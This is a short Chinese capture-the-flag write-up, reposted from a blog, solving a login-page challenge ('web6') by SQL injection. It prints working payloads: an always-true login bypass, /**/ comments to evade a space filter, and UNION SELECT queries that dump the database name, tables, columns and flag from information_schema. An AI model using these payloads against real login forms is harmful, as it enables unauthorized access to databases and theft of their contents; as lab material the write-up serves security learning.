标签:username show admin #& union ctf web6 password select
打开链接发现是登录界面,猜测是sql注入,先用万能密码测试一下
1' or 1=1#
发现有些字符被过滤了,经过测试,发现空格被过滤了
因此使用/**/代替空格。
password=admin'/**/union/**/select/**/1,2,3#&username=admin
发现2回显
接着开始爆库
password=admin'/**/union/**/select/**/1,database(),3#&username=admin
爆表
password=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#&username=admin
爆字段
password=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#&username=admin
爆字段值
password=admin'/**/or/**/1=1/**/union/**/select/**/1,flag,3/**/from/**/flag#&username=admin
获得flag
标签:username,show,admin,#&,union,ctf,web6,password,select 来源: https://www.cnblogs.com/Dreamerwd/p/15863874.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。